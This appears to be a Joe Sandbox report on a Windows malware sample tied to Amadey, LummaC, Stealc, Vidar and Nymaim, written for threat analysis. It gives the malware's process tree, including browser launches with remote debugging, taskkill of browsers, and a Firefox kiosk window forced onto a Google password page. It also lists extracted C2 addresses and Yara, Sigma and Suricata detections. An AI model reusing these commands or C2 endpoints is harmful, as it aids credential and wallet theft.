Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
file.exe

Overview

General Information

Sample name:file.exe
Analysis ID:1568907
MD5:549b91abce102d3f86f3baea12da44cf
SHA1:751694b6a55efb068eb998c5881e78d5d51fccf6
SHA256:2c652a9034ebd3fbd6d504e140d9b68ffc858e07679f61b58efef50c7536e6cd
Tags:exeuser-Bitsight
Infos:

Detection

Amadey, Credential Flusher, LummaC Stealer, Nymaim, Stealc, Vidar
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Antivirus detection for dropped file
Attempt to bypass Chrome Application-Bound Encryption
Detected unpacking (changes PE section rights)
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected Amadeys stealer DLL
Yara detected Credential Flusher
Yara detected LummaC Stealer
Yara detected Nymaim
Yara detected Powershell download and execute
Yara detected Stealc
Yara detected Vidar stealer
AI detected suspicious sample
Binary is likely a compiled AutoIt script file
C2 URLs / IPs found in malware configuration
Creates multiple autostart registry keys
Drops PE files to the document folder of the user
Found evasive API chain (may stop execution after reading information in the PEB, e.g. number of processors)
Found many strings related to Crypto-Wallets (likely being stolen)
Hides threads from debuggers
Machine Learning detection for dropped file
Machine Learning detection for sample
Monitors registry run keys for changes
PE file contains section with special chars
Query firmware table information (likely to detect VMs)
Sample uses string decryption to hide its real strings
Sigma detected: New RUN Key Pointing to Suspicious Folder
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to detect virtualization through RDTSC time measurements
Tries to evade debugger and weak emulator (self modifying code)
Tries to harvest and steal Bitcoin Wallet information
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Crypto Currency Wallets
Tries to steal Mail credentials (via file / registry access)
AV process strings found (often used to terminate AV products)
Checks for debuggers (devices)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to dynamically determine API calls
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Creates job files (autostart)
Detected potential crypto function
Downloads executable code via HTTP
Dropped file seen in connection with other malware
Drops PE files
Drops PE files to the application program directory (C:\ProgramData)
Enables debug privileges
Entry point lies outside standard sections
Extensive use of GetProcAddress (often used to hide API calls)
Found dropped PE file which has not been started or loaded
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains an invalid checksum
PE file contains sections with non-standard names
Queries information about the installed CPU (vendor, model number etc)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Searches for user specific document files
Sigma detected: Browser Started with Remote Debugging
Sigma detected: CurrentVersion Autorun Keys Modification
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)
Uses taskkill to terminate processes
Yara detected Credential Stealer
Yara signature match

Classification

Process Tree

  • System is w10x64
  • file.exe (PID: 7276 cmdline: "C:\Users\user\Desktop\file.exe" MD5: 549B91ABCE102D3F86F3BAEA12DA44CF)
    • chrome.exe (PID: 7604 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9229 --profile-directory="" MD5: 5BBFA6CBDF4C254EB368D534F9E23C92)
      • chrome.exe (PID: 7868 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2528 --field-trial-handle=2304,i,13957326758285335297,13387350500971898987,262144 /prefetch:8 MD5: 5BBFA6CBDF4C254EB368D534F9E23C92)
    • msedge.exe (PID: 3784 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9229 --profile-directory="" MD5: BF154738460E4AB1D388970E1AB13FAB)
      • msedge.exe (PID: 876 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2388 --field-trial-handle=2280,i,12676847085568592327,10287468504227214058,262144 /prefetch:3 MD5: BF154738460E4AB1D388970E1AB13FAB)
    • cmd.exe (PID: 4592 cmdline: "C:\Windows\system32\cmd.exe" /c start "" "C:\Users\user\Documents\EBFBFBFIIJ.exe" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • conhost.exe (PID: 8124 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • EBFBFBFIIJ.exe (PID: 672 cmdline: "C:\Users\user\Documents\EBFBFBFIIJ.exe" MD5: 03FD571125408D973DA12445B72683F8)
        • skotes.exe (PID: 7804 cmdline: "C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe" MD5: 03FD571125408D973DA12445B72683F8)
          • rhnew.exe (PID: 6536 cmdline: "C:\Users\user\AppData\Local\Temp\1012278001\rhnew.exe" MD5: F7286FEF9317FE91E24CDA721EC0BE81)
          • e6d73861f4.exe (PID: 3540 cmdline: "C:\Users\user\AppData\Local\Temp\1012279001\e6d73861f4.exe" MD5: 872445F439140F8B8DB73EC546971CC9)
          • fc1511c233.exe (PID: 3636 cmdline: "C:\Users\user\AppData\Local\Temp\1012280001\fc1511c233.exe" MD5: 4EB2DA97A1AB9E042EB27A0B7AAC7C82)
          • 6ae2430bb1.exe (PID: 5396 cmdline: "C:\Users\user\AppData\Local\Temp\1012281001\6ae2430bb1.exe" MD5: 549B91ABCE102D3F86F3BAEA12DA44CF)
          • 1b3b76c439.exe (PID: 7712 cmdline: "C:\Users\user\AppData\Local\Temp\1012282001\1b3b76c439.exe" MD5: 24446188A72C828117E1E29423CCBDAD)
            • taskkill.exe (PID: 4488 cmdline: taskkill /F /IM firefox.exe /T MD5: CA313FD7E6C2A778FFD21CFB5C1C56CD)
              • conhost.exe (PID: 7284 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
            • taskkill.exe (PID: 5032 cmdline: taskkill /F /IM chrome.exe /T MD5: CA313FD7E6C2A778FFD21CFB5C1C56CD)
              • conhost.exe (PID: 2836 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
            • taskkill.exe (PID: 4828 cmdline: taskkill /F /IM msedge.exe /T MD5: CA313FD7E6C2A778FFD21CFB5C1C56CD)
              • conhost.exe (PID: 6896 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
            • taskkill.exe (PID: 8004 cmdline: taskkill /F /IM opera.exe /T MD5: CA313FD7E6C2A778FFD21CFB5C1C56CD)
              • conhost.exe (PID: 3052 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
            • taskkill.exe (PID: 7820 cmdline: taskkill /F /IM brave.exe /T MD5: CA313FD7E6C2A778FFD21CFB5C1C56CD)
              • conhost.exe (PID: 7808 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
            • firefox.exe (PID: 7524 cmdline: "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk "https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd" --no-default-browser-check --disable-popup-blocking MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)
  • msedge.exe (PID: 3320 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9229 --profile-directory --flag-switches-begin --flag-switches-end --disable-nacl --do-not-de-elevate MD5: BF154738460E4AB1D388970E1AB13FAB)
    • msedge.exe (PID: 8172 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2204 --field-trial-handle=1988,i,4276003573003532254,7619762625833500772,262144 /prefetch:3 MD5: BF154738460E4AB1D388970E1AB13FAB)
  • fc1511c233.exe (PID: 6484 cmdline: "C:\Users\user\AppData\Local\Temp\1012280001\fc1511c233.exe" MD5: 4EB2DA97A1AB9E042EB27A0B7AAC7C82)
  • skotes.exe (PID: 7356 cmdline: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe MD5: 03FD571125408D973DA12445B72683F8)
  • firefox.exe (PID: 5264 cmdline: "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd --no-default-browser-check --disable-popup-blocking --attempting-deelevation MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)
    • firefox.exe (PID: 5204 cmdline: "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd --no-default-browser-check --disable-popup-blocking MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)
  • 6ae2430bb1.exe (PID: 6464 cmdline: "C:\Users\user\AppData\Local\Temp\1012281001\6ae2430bb1.exe" MD5: 549B91ABCE102D3F86F3BAEA12DA44CF)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
AmadeyAmadey is a botnet that appeared around October 2018 and is being sold for about $500 on Russian-speaking hacking forums. It periodically sends information about the system and installed AV software to its C2 server and polls to receive orders from it. Its main functionality is that it can load other payloads (called "tasks") for all or specifically targeted computers compromised by the malware.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.amadey
NameDescriptionAttributionBlogpost URLsLink
NymaimNymaim is a trojan downloader. It downloads (and runs) other malware on affected systems and was one of the primary malware families hosted on Avalanche. Nymaim is different in that it displays a localized lockscreen while it downloads additional malware. Nymaim is usually delivered by exploit kits and malvertising.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.nymaim
NameDescriptionAttributionBlogpost URLsLink
StealcStealc is an information stealer advertised by its presumed developer Plymouth on Russian-speaking underground forums and sold as a Malware-as-a-Service since January 9, 2023. According to Plymouth's statement, stealc is a non-resident stealer with flexible data collection settings and its development is relied on other prominent stealers: Vidar, Raccoon, Mars and Redline.Stealc is written in C and uses WinAPI functions. It mainly targets date from web browsers, extensions and Desktop application of cryptocurrency wallets, and from other applications (messengers, email clients, etc.). The malware downloads 7 legitimate third-party DLLs to collect sensitive data from web browsers, including sqlite3.dll, nss3.dll, vcruntime140.dll, mozglue.dll, freebl3.dll, softokn3.dll and msvcp140.dll. It then exfiltrates the collected information file by file to its C2 server using HTTP POST requests.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.stealc
NameDescriptionAttributionBlogpost URLsLink
VidarVidar is a forked malware based on Arkei. It seems this stealer is one of the first that is grabbing information on 2FA Software and Tor Browser.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.vidar

Malware Configuration

Threatname: StealC

{"C2 url": "http://185.215.113.206/c4becf79229cb002.php"}

Threatname: LummaC

{"C2 url": ["covery-mover.biz", "formy-spill.biz", "dwell-exclaim.biz", "dare-curbys.biz", "zinc-sneark.biz", "atten-supporse.biz", "print-vexer.biz", "impend-differ.biz", "se-blurry.biz"], "Build id": "LOGS11--LiveTraffic"}

Threatname: Amadey

{"C2 url": "185.215.113.43/Zu7JuNko/index.php", "Version": "4.42", "Install Folder": "abc3bc1985", "Install File": "skotes.exe"}

Threatname: Nymaim

{"C2 addresses": ["92.63.197.221", "92.63.197.221", "92.63.197.221"]}

Yara Signatures

PCAP (Network Traffic)

SourceRuleDescriptionAuthorStrings
dump.pcapJoeSecurity_Stealc_1Yara detected StealcJoe Security
    sslproxydump.pcapJoeSecurity_LummaCStealer_3Yara detected LummaC StealerJoe Security
      sslproxydump.pcapJoeSecurity_LummaCStealer_2Yara detected LummaC StealerJoe Security

        Memory Dumps

        SourceRuleDescriptionAuthorStrings
        00000000.00000002.2727922118.0000000000B74000.00000040.00000001.01000000.00000003.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
          0000001A.00000002.3429190490.0000000000E3A000.00000040.00000020.00020000.00000000.sdmpWindows_Trojan_RedLineStealer_ed346e4cunknownunknown
          • 0x1738:$a: 55 8B EC 8B 45 14 56 57 8B 7D 08 33 F6 89 47 0C 39 75 10 76 15 8B
          0000001C.00000002.3259318138.00000000008B1000.00000040.00000001.01000000.00000011.sdmpJoeSecurity_StealcYara detected StealcJoe Security
            0000001B.00000003.3341908004.000000000149C000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
              00000030.00000003.3348999903.0000000004BB0000.00000004.00001000.00020000.00000000.sdmpJoeSecurity_StealcYara detected StealcJoe Security
                Click to see the 31 entries

                Unpacked PEs

                SourceRuleDescriptionAuthorStrings
                26.2.e6d73861f4.exe.400000.0.raw.unpackJoeSecurity_NymaimYara detected NymaimJoe Security
                  26.2.e6d73861f4.exe.400000.0.unpackJoeSecurity_NymaimYara detected NymaimJoe Security
                    26.2.e6d73861f4.exe.4b30e67.1.raw.unpackJoeSecurity_NymaimYara detected NymaimJoe Security
                      26.3.e6d73861f4.exe.4cf0000.0.raw.unpackJoeSecurity_NymaimYara detected NymaimJoe Security
                        34.2.skotes.exe.880000.0.unpackJoeSecurity_Amadey_2Yara detected Amadey\'s stealer DLLJoe Security
                          Click to see the 2 entries

                          Sigma Signatures

                          System Summary

                          barindex
                          Sigma detected: New RUN Key Pointing to Suspicious Folder
                          Source: Registry Key setAuthor: Florian Roth (Nextron Systems), Markus Neis, Sander Wiebing: Data: Details: C:\Users\user\AppData\Local\Temp\1012280001\fc1511c233.exe, EventID: 13, EventType: SetValue, Image: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe, ProcessId: 7804, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\fc1511c233.exe
                          Sigma detected: Browser Started with Remote Debugging
                          Source: Process startedAuthor: pH-T (Nextron Systems), Nasreddine Bencherchali (Nextron Systems): Data: Command: "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9229 --profile-directory="", CommandLine: "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9229 --profile-directory="", CommandLine|base64offset|contains: ^", Image: C:\Program Files\Google\Chrome\Application\chrome.exe, NewProcessName: C:\Program Files\Google\Chrome\Application\chrome.exe, OriginalFileName: C:\Program Files\Google\Chrome\Application\chrome.exe, ParentCommandLine: "C:\Users\user\Desktop\file.exe", ParentImage: C:\Users\user\Desktop\file.exe, ParentProcessId: 7276, ParentProcessName: file.exe, ProcessCommandLine: "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9229 --profile-directory="", ProcessId: 7604, ProcessName: chrome.exe
                          Sigma detected: CurrentVersion Autorun Keys Modification
                          Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: C:\Users\user\AppData\Local\Temp\1012280001\fc1511c233.exe, EventID: 13, EventType: SetValue, Image: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe, ProcessId: 7804, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\fc1511c233.exe

                          Suricata Signatures

                          TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                          2024-12-05T07:33:38.699216+010020283713Unknown Traffic192.168.2.6498002.20.60.64443TCP
                          2024-12-05T07:34:27.954729+010020283713Unknown Traffic192.168.2.649945172.67.181.44443TCP
                          2024-12-05T07:34:29.842015+010020283713Unknown Traffic192.168.2.649952172.67.181.44443TCP
                          2024-12-05T07:34:53.435870+010020283713Unknown Traffic192.168.2.650002172.67.165.166443TCP
                          2024-12-05T07:34:55.911242+010020283713Unknown Traffic192.168.2.650009172.67.165.166443TCP
                          2024-12-05T07:34:58.821026+010020283713Unknown Traffic192.168.2.650018172.67.165.166443TCP
                          2024-12-05T07:35:01.793573+010020283713Unknown Traffic192.168.2.650024172.67.165.166443TCP
                          2024-12-05T07:35:02.345375+010020283713Unknown Traffic192.168.2.650030172.67.165.166443TCP
                          2024-12-05T07:35:04.656486+010020283713Unknown Traffic192.168.2.650038172.67.165.166443TCP
                          2024-12-05T07:35:05.739991+010020283713Unknown Traffic192.168.2.650039172.67.165.166443TCP
                          2024-12-05T07:35:10.362680+010020283713Unknown Traffic192.168.2.650054172.67.165.166443TCP
                          2024-12-05T07:35:14.626646+010020283713Unknown Traffic192.168.2.650069172.67.165.166443TCP
                          2024-12-05T07:35:34.518330+010020283713Unknown Traffic192.168.2.650082172.67.165.166443TCP
                          2024-12-05T07:35:39.171960+010020283713Unknown Traffic192.168.2.650083172.67.165.166443TCP
                          2024-12-05T07:35:41.904721+010020283713Unknown Traffic192.168.2.650084172.67.165.166443TCP
                          2024-12-05T07:35:44.569779+010020283713Unknown Traffic192.168.2.650085172.67.165.166443TCP
                          2024-12-05T07:35:47.333452+010020283713Unknown Traffic192.168.2.650088172.67.165.166443TCP
                          2024-12-05T07:35:49.888737+010020283713Unknown Traffic192.168.2.650089172.67.165.166443TCP
                          2024-12-05T07:35:52.759587+010020283713Unknown Traffic192.168.2.650090172.67.165.166443TCP
                          TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                          2024-12-05T07:34:29.132729+010020546531A Network Trojan was detected192.168.2.649945172.67.181.44443TCP
                          2024-12-05T07:34:54.423748+010020546531A Network Trojan was detected192.168.2.650002172.67.165.166443TCP
                          2024-12-05T07:34:57.244828+010020546531A Network Trojan was detected192.168.2.650009172.67.165.166443TCP
                          2024-12-05T07:35:04.128979+010020546531A Network Trojan was detected192.168.2.650030172.67.165.166443TCP
                          2024-12-05T07:35:35.327902+010020546531A Network Trojan was detected192.168.2.650082172.67.165.166443TCP
                          2024-12-05T07:35:40.291322+010020546531A Network Trojan was detected192.168.2.650083172.67.165.166443TCP
                          TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                          2024-12-05T07:34:29.132729+010020498361A Network Trojan was detected192.168.2.649945172.67.181.44443TCP
                          2024-12-05T07:34:54.423748+010020498361A Network Trojan was detected192.168.2.650002172.67.165.166443TCP
                          2024-12-05T07:35:04.128979+010020498361A Network Trojan was detected192.168.2.650030172.67.165.166443TCP
                          2024-12-05T07:35:35.327902+010020498361A Network Trojan was detected192.168.2.650082172.67.165.166443TCP
                          TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                          2024-12-05T07:34:57.244828+010020498121A Network Trojan was detected192.168.2.650009172.67.165.166443TCP
                          2024-12-05T07:35:40.291322+010020498121A Network Trojan was detected192.168.2.650083172.67.165.166443TCP
                          TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                          2024-12-05T07:34:53.435870+010020579221Domain Observed Used for C2 Detected192.168.2.650002172.67.165.166443TCP
                          2024-12-05T07:34:55.911242+010020579221Domain Observed Used for C2 Detected192.168.2.650009172.67.165.166443TCP
                          2024-12-05T07:34:58.821026+010020579221Domain Observed Used for C2 Detected192.168.2.650018172.67.165.166443TCP
                          2024-12-05T07:35:01.793573+010020579221Domain Observed Used for C2 Detected192.168.2.650024172.67.165.166443TCP
                          2024-12-05T07:35:02.345375+010020579221Domain Observed Used for C2 Detected192.168.2.650030172.67.165.166443TCP
                          2024-12-05T07:35:04.656486+010020579221Domain Observed Used for C2 Detected192.168.2.650038172.67.165.166443TCP
                          2024-12-05T07:35:05.739991+010020579221Domain Observed Used for C2 Detected192.168.2.650039172.67.165.166443TCP
                          2024-12-05T07:35:10.362680+010020579221Domain Observed Used for C2 Detected192.168.2.650054172.67.165.166443TCP
                          2024-12-05T07:35:14.626646+010020579221Domain Observed Used for C2 Detected192.168.2.650069172.67.165.166443TCP
                          2024-12-05T07:35:34.518330+010020579221Domain Observed Used for C2 Detected192.168.2.650082172.67.165.166443TCP
                          2024-12-05T07:35:39.171960+010020579221Domain Observed Used for C2 Detected192.168.2.650083172.67.165.166443TCP
                          2024-12-05T07:35:41.904721+010020579221Domain Observed Used for C2 Detected192.168.2.650084172.67.165.166443TCP
                          2024-12-05T07:35:44.569779+010020579221Domain Observed Used for C2 Detected192.168.2.650085172.67.165.166443TCP
                          2024-12-05T07:35:47.333452+010020579221Domain Observed Used for C2 Detected192.168.2.650088172.67.165.166443TCP
                          2024-12-05T07:35:49.888737+010020579221Domain Observed Used for C2 Detected192.168.2.650089172.67.165.166443TCP
                          2024-12-05T07:35:52.759587+010020579221Domain Observed Used for C2 Detected192.168.2.650090172.67.165.166443TCP
                          TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                          2024-12-05T07:34:27.954729+010020579761Domain Observed Used for C2 Detected192.168.2.649945172.67.181.44443TCP
                          2024-12-05T07:34:29.842015+010020579761Domain Observed Used for C2 Detected192.168.2.649952172.67.181.44443TCP
                          TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                          2024-12-05T07:34:28.122199+010020446961A Network Trojan was detected192.168.2.649944185.215.113.4380TCP
                          2024-12-05T07:34:36.684579+010020446961A Network Trojan was detected192.168.2.649967185.215.113.4380TCP
                          2024-12-05T07:34:46.557557+010020446961A Network Trojan was detected192.168.2.649985185.215.113.4380TCP
                          2024-12-05T07:34:55.606299+010020446961A Network Trojan was detected192.168.2.650003185.215.113.4380TCP
                          2024-12-05T07:35:02.845486+010020446961A Network Trojan was detected192.168.2.650031185.215.113.4380TCP
                          2024-12-05T07:35:13.128139+010020446961A Network Trojan was detected192.168.2.650061185.215.113.4380TCP
                          TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                          2024-12-05T07:34:52.060353+010020579211Domain Observed Used for C2 Detected192.168.2.6583371.1.1.153UDP
                          TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                          2024-12-05T07:34:26.378015+010020579751Domain Observed Used for C2 Detected192.168.2.6635231.1.1.153UDP
                          TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                          2024-12-05T07:33:13.327722+010020442451Malware Command and Control Activity Detected185.215.113.20680192.168.2.649714TCP
                          TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                          2024-12-05T07:33:13.098422+010020442441Malware Command and Control Activity Detected192.168.2.649714185.215.113.20680TCP
                          TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                          2024-12-05T07:33:13.648254+010020442461Malware Command and Control Activity Detected192.168.2.649714185.215.113.20680TCP
                          TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                          2024-12-05T07:33:15.190472+010020442481Malware Command and Control Activity Detected192.168.2.649714185.215.113.20680TCP
                          TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                          2024-12-05T07:33:13.771279+010020442471Malware Command and Control Activity Detected185.215.113.20680192.168.2.649714TCP
                          TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                          2024-12-05T07:34:59.898432+010020480941Malware Command and Control Activity Detected192.168.2.650018172.67.165.166443TCP
                          2024-12-05T07:35:50.973678+010020480941Malware Command and Control Activity Detected192.168.2.650089172.67.165.166443TCP
                          TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                          2024-12-05T07:33:12.635562+010020442431Malware Command and Control Activity Detected192.168.2.649714185.215.113.20680TCP
                          2024-12-05T07:34:56.902337+010020442431Malware Command and Control Activity Detected192.168.2.650010185.215.113.20680TCP
                          2024-12-05T07:35:13.475853+010020442431Malware Command and Control Activity Detected192.168.2.650060185.215.113.20680TCP
                          2024-12-05T07:35:45.475978+010020442431Malware Command and Control Activity Detected192.168.2.650086185.215.113.20680TCP
                          TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                          2024-12-05T07:34:16.842351+010028561471A Network Trojan was detected192.168.2.649909185.215.113.4380TCP
                          TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                          2024-12-05T07:34:26.775548+010028561221A Network Trojan was detected185.215.113.4380192.168.2.649918TCP
                          TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                          2024-12-05T07:34:21.292119+010028033053Unknown Traffic192.168.2.64992331.41.244.1180TCP
                          2024-12-05T07:34:29.588374+010028033053Unknown Traffic192.168.2.64994731.41.244.1180TCP
                          2024-12-05T07:34:38.141736+010028033053Unknown Traffic192.168.2.649970185.215.113.1680TCP
                          2024-12-05T07:34:48.094437+010028033053Unknown Traffic192.168.2.649991185.215.113.1680TCP
                          2024-12-05T07:34:57.063626+010028033053Unknown Traffic192.168.2.650012185.215.113.1680TCP
                          2024-12-05T07:35:04.394660+010028033053Unknown Traffic192.168.2.650032185.215.113.1680TCP
                          2024-12-05T07:35:14.587001+010028033053Unknown Traffic192.168.2.65006831.41.244.1180TCP
                          TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                          2024-12-05T07:33:15.631974+010028033043Unknown Traffic192.168.2.649714185.215.113.20680TCP
                          2024-12-05T07:33:43.524056+010028033043Unknown Traffic192.168.2.649809185.215.113.20680TCP
                          2024-12-05T07:33:45.603087+010028033043Unknown Traffic192.168.2.649809185.215.113.20680TCP
                          2024-12-05T07:33:46.896986+010028033043Unknown Traffic192.168.2.649809185.215.113.20680TCP
                          2024-12-05T07:33:47.981061+010028033043Unknown Traffic192.168.2.649809185.215.113.20680TCP
                          2024-12-05T07:33:51.413828+010028033043Unknown Traffic192.168.2.649809185.215.113.20680TCP
                          2024-12-05T07:33:52.534457+010028033043Unknown Traffic192.168.2.649809185.215.113.20680TCP
                          2024-12-05T07:33:58.073057+010028033043Unknown Traffic192.168.2.649866185.215.113.1680TCP
                          TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                          2024-12-05T07:35:14.630263+010028438641A Network Trojan was detected192.168.2.650069172.67.165.166443TCP

                          Joe Sandbox Signatures

                          Click to jump to signature section

                          Show All Signature Results

                          AV Detection

                          barindex
                          Antivirus / Scanner detection for submitted sample
                          Source: file.exeAvira: detected
                          Antivirus detection for URL or domain
                          Source: https://dare-curbys.biz/Avira URL Cloud: Label: malware
                          Source: http://185.215.113.206/ulAvira URL Cloud: Label: malware
                          Source: http://185.215.113.206/c4becf79229cb002.phpuSAvira URL Cloud: Label: malware
                          Source: https://atten-supporse.biz/apiMvAvira URL Cloud: Label: malware
                          Antivirus detection for dropped file
                          Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6ATIQPJI\random[2].exeAvira: detection malicious, Label: TR/Crypt.TPM.Gen
                          Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6ATIQPJI\random[1].exeAvira: detection malicious, Label: TR/Crypt.TPM.Gen
                          Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\random[1].exeAvira: detection malicious, Label: HEUR/AGEN.1320706
                          Found malware configuration
                          Source: 0000001C.00000002.3262194656.000000000140E000.00000004.00000020.00020000.00000000.sdmpMalware Configuration Extractor: StealC {"C2 url": "http://185.215.113.206/c4becf79229cb002.php"}
                          Source: 00000016.00000002.3419500975.0000000000881000.00000040.00000001.01000000.0000000D.sdmpMalware Configuration Extractor: Amadey {"C2 url": "185.215.113.43/Zu7JuNko/index.php", "Version": "4.42", "Install Folder": "abc3bc1985", "Install File": "skotes.exe"}
                          Source: 26.2.e6d73861f4.exe.400000.0.raw.unpackMalware Configuration Extractor: Nymaim {"C2 addresses": ["92.63.197.221", "92.63.197.221", "92.63.197.221"]}
                          Source: fc1511c233.exe.3636.27.memstrminMalware Configuration Extractor: LummaC {"C2 url": ["covery-mover.biz", "formy-spill.biz", "dwell-exclaim.biz", "dare-curbys.biz", "zinc-sneark.biz", "atten-supporse.biz", "print-vexer.biz", "impend-differ.biz", "se-blurry.biz"], "Build id": "LOGS11--LiveTraffic"}
                          Multi AV Scanner detection for dropped file
                          Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6ATIQPJI\random[2].exeReversingLabs: Detection: 36%
                          Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\random[1].exeReversingLabs: Detection: 44%
                          Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\random[2].exeReversingLabs: Detection: 44%
                          Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BLNS00AZ\random[1].exeReversingLabs: Detection: 36%
                          Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\RCIIZOAM\random[1].exeReversingLabs: Detection: 21%
                          Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\RCIIZOAM\rhnew[1].exeReversingLabs: Detection: 54%
